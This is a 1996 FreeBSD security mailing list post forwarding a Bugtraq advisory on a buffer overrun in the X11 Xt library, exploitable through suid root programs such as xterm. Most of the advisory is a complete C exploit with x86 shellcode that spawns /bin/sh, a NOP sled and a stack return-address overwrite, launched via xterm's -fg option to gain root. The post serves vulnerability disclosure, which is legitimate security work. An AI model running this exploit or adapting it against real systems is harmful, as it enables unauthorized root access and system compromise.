From owner-freebsd-security Sat Aug 24 23:05:24 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA10085 for security-outgoing; Sat, 24 Aug 1996 23:05:24 -0700 (PDT) Received: from gwydion.hns.st-louis.mo.us (kenth@dialup-34.hunter.com [199.217.148.34]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA10079 for ; Sat, 24 Aug 1996 23:05:18 -0700 (PDT) Received: (from kenth@localhost) by gwydion.hns.st-louis.mo.us (8.7.5/8.7.3) id BAA22181 for freebsd-security@freebsd.org; Sun, 25 Aug 1996 01:05:20 -0500 (CDT) From: Kent Hamilton Message-Id: <199608250605.BAA22181@gwydion.hns.st-louis.mo.us> Subject: Vulnerability in the Xt library (fwd) To: freebsd-security@freebsd.org Date: Sun, 25 Aug 1996 01:05:20 -0500 (CDT) X-Mailer: ELM [version 2.4 PL24 ME8a] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Thought this might be of interest. ----- Forwarded message from Aleph One ----- >From NETSPACE.ORG!owner-bugtraq@scsgate.scscom.com Sat Aug 24 11:50:51 1996 Sender: NETSPACE.ORG!owner-bugtraq@scsgate.scscom.com Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Approved-By: Aleph One Message-Id: Date: Sat, 24 Aug 1996 02:14:24 -0700 Reply-To: Bugtraq List Sender: Bugtraq List From: Aleph One Subject: Vulnerability in the Xt library X-Cc: xfree86@xfree86.org, jff@x.org, matt@x.org, xbugs@x.org, gildea@x.org To: Multiple recipients of list BUGTRAQ There exists at least one vulnerability in the Xt library caused by a buffer overrun that allows arbitrary code to be executed. This vulnerability exists in the Xt library itself. As such all programs linked with it that are suid root or can be coerced into running as root are vulnerable. The standard example is of curse suid xterm. The vulnerability has been confirmed under FreeBSD, Solaris, and as far as we can tell every single other OS running all revisions of X11. There exists a large number of places in the Xt library code where buffers allocated on the stack are handled insecurly other than the one used on the fallowing exploit. The Xt library is a can of worms. The original author of this vulnerability is "b0z0 bra1n". x86 exploit tested under FreeBSD fallows. For other x86 operating systems play around with the offset: #include #include #include #define DEFAULT_OFFSET 0 #define BUFFER_SIZE 1491 long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char **argv) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50" "\xeb\x18" "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02" "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04"; int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE; if(argc>1) ofs=atoi(argv[1]); if(argc>2) bs=atoi(argv[2]); printf("Using offset of esp + %d (%x)\nBuffer size %d\n", ofs, get_esp()+ofs, bs); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, bs-strlen(execshell)); ptr += bs-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL); } Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 ----- End of forwarded message from Aleph One ----- -- Kent Hamilton Play: KentH@HNS.St-Louis.MO.US NIC Handle: KH91 URL: http://www.icon-stl.net/~khamilto/ Blessed Be.... Work: KHamilton@Hunter.COM